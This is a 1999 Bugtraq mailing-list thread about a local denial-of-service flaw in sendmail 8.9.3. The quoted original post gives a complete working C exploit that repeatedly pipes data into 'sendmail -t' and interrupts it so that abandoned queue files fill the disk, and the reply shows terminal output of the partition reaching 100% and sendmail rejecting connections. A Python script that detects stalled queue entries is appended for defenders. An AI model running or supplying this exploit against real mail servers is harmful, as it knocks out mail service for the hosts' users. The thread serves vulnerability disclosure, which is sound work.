Well, this is very interesting... this is what I found by running this binary for 30 seconds =)

Before:

# df /
Filesystem         1024-blocks  Used Available Capacity Mounted on
/dev/hda1             303251   87681   199909     30%   /
# ps auwx | grep sendmail
root      1427  0.0  0.4  1324   816  ?  S   Mar 27   0:00 sendmail: accepting connections on port 25
# ls -l /var/spool/mqueue
total 0
#

After (30 seconds running):

# df /
Filesystem         1024-blocks  Used Available Capacity Mounted on
/dev/hda1             303251  107548   180042     37%   /

(not too bad but another 30 seconds later another df)

Filesystem         1024-blocks  Used Available Capacity Mounted on
/dev/hda1             303251  146235   141355     51%   /
# ps auwx | grep sendmail
mail     17144 70.5  0.4  1348   820  p1 R    11:35   0:48 /usr/sbin/sendmail -t
root      1427  0.0  0.4  1324   816  ?  S   Mar 27   0:00 sendmail: accepting connections on port 25

(sendmail kindly using 70% of my CPU)

# ls -l /var/spool/mqueue
total 115854
-rw-------   1 mail     mail     118169600 Apr  1 11:37 dfLAA17144
-rw-------   1 mail     mail             0 Apr  1 11:35 qfLAA17144
-rw-------   1 mail     mail             0 Apr  1 11:35 xfLAA17144

(once again a df)

# df /
Filesystem         1024-blocks  Used Available Capacity Mounted on
/dev/hda1             303251  224734    62856     78%   /

and once the hard drive becomes filled sendmail stops accepting connections since it has no temp space.

# df /
Filesystem         1024-blocks  Used Available Capacity Mounted on
/dev/hda1             303251  287590        0    100%   /
# ps auwx | grep sendmail
mail     17144 68.5  0.4  1348   820  p1 R    11:35   2:33 /usr/wrapped/sendmail -t
root      1427  0.0  0.4  1324   816  ?  S   Mar 27   0:00 sendmail: rejecting connections on port 25: min free: 100
#

People, this is no April Fools' joke =)

Raymond T Sundland
MCSE, MCP, MCP+Internet
PGP Key: finger pgpat_private

|-----Original Message-----
|From: Bugtraq List [mailto:BUGTRAQat_private]On Behalf Of Lukasz Luzar
|Sent: Thursday, April 01, 1999 9:00 AM
|To: BUGTRAQat_private
|Subject: Possible local DoS in sendmail
|
|
|Hi,
|It seems that sendmail run with the -t option does NOT block SIGINT ...
|At the moment we are sending data to its stdin, when we press
|CTRL-C the process is killed, but an unfinished letter remains in the queue.
|It stays there quite long - long enough to fill the partition on the disk
|where /var/spool/mqueue resides.
|When that happens, sendmail doesn't allow new connections - so it is a kind
|of DoS attack on this service.
|It has been tested on all new versions of sendmail up to the current one (8.9.3).
|
|Example ...
|
| --- CUT HERE ----
| #include <stdio.h>
| #include <stdlib.h>
| #include <unistd.h>
| #include <signal.h>
| #include <sys/wait.h>
|
| #define DELAY   5    /* time in seconds needed to reach MaxMessageSize limit */
| #define SM_PATH "/usr/sbin/sendmail -t"
|
| int main(void)
| {
|     FILE *fd;
|     int pid;
|
|     for(;;) {
|         if(( pid = fork()) == 0) {
|             /* child: own process group, so the signal below reaches
|                both this process and the sendmail it spawned */
|             setpgrp();
|             if(( fd = popen( SM_PATH, "w")) == NULL) {
|                 fprintf( stderr, "popen error\n");
|                 exit( 1);   /* do not write to a NULL stream */
|             }
|
|             /* feed the message body to sendmail's stdin until interrupted */
|             for(;;) fputc( 'A', fd);
|         } else {
|             /* parent: after DELAY seconds send SIGINT to the child's group */
|             sleep( DELAY);
|             kill( (-1) * pid, SIGINT);
|             fprintf( stdout, "next\n");
|             wait( NULL);
|         }
|     }
| }
|--- CUT HERE ---
|
|Regards,
|
|---
|Lukasz Luzar                     K.K.I.
|http://noname.kki.krakow.pl/     lluzarat_private
|
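
A defender-side check for the condition visible in the reply's `ls -l /var/spool/mqueue` listing, as an added example that is not part of either message: it scans a queue directory for entries whose qf control file is empty or missing while the df body file is large, and reports how much of the partition is still free. The function names, the 10 MB threshold and the second queue entry in the sample are assumptions made for illustration; the LAA17144 file names and size are taken from the listing.

```python
import os
import tempfile

def find_stalled_entries(queue_dir, min_df_bytes=10 * 1024 * 1024):
    """Return [(queue_id, df_bytes, owner_uid)], largest first, for entries
    whose qf file is empty or missing while df is at least min_df_bytes."""
    seen = {}  # queue_id -> {"df": (size, uid), "qf": (size, uid)}
    with os.scandir(queue_dir) as it:
        for entry in it:
            prefix, queue_id = entry.name[:2], entry.name[2:]
            if prefix in ("df", "qf") and queue_id and entry.is_file(follow_symlinks=False):
                st = entry.stat(follow_symlinks=False)
                seen.setdefault(queue_id, {})[prefix] = (st.st_size, st.st_uid)
    hits = []
    for queue_id, files in seen.items():
        df_size, uid = files.get("df", (0, None))
        qf_size, _ = files.get("qf", (0, None))
        # Heuristic (assumption): a message still being collected can match
        # briefly, so only bodies above the size threshold are reported.
        if qf_size == 0 and df_size >= min_df_bytes:
            hits.append((queue_id, df_size, uid))
    return sorted(hits, key=lambda h: h[1], reverse=True)

def free_fraction(path):
    """Fraction of the filesystem holding path that unprivileged users can still use."""
    st = os.statvfs(path)
    return st.f_bavail / st.f_blocks if st.f_blocks else 0.0

def build_sample_queue(root):
    """Constructed sample: LAA17144 mirrors the listing, LAA00001 is a normal entry."""
    layout = {"dfLAA17144": 118169600, "qfLAA17144": 0, "xfLAA17144": 0,
              "dfLAA00001": 2048, "qfLAA00001": 512}
    for name, size in layout.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.truncate(size)  # sparse file: apparent size only, no data written
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_queue(tmp)
        for qid, size, uid in find_stalled_entries(tmp):
            print(f"{qid}: df is {size} bytes with empty qf, owner uid {uid}")
        print(f"free space on queue partition: {free_fraction(tmp):.0%}")
```

The owner uid in each hit identifies the local account whose submission left the entry behind.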